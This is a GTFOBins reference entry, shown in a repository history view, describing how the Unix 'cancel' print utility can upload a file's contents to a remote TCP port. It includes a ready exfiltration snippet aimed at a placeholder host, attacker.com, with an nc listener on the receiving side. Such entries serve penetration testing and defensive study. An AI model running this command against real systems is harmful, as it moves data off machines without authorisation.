GTFOBins.github.io/_gtfobins/cancel.md

11 lines
318 B
Markdown
Raw Normal View History

2018-12-31 08:38:20 +00:00
---
functions:
file-upload:
- description: Send contents of a file to a TCP port. Run `nc -nlvp $RPORT > "file to save"` on the attacker system to capture the contents.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
cancel -u "$(cat $LFILE)" -h $RHOST:$RPORT
---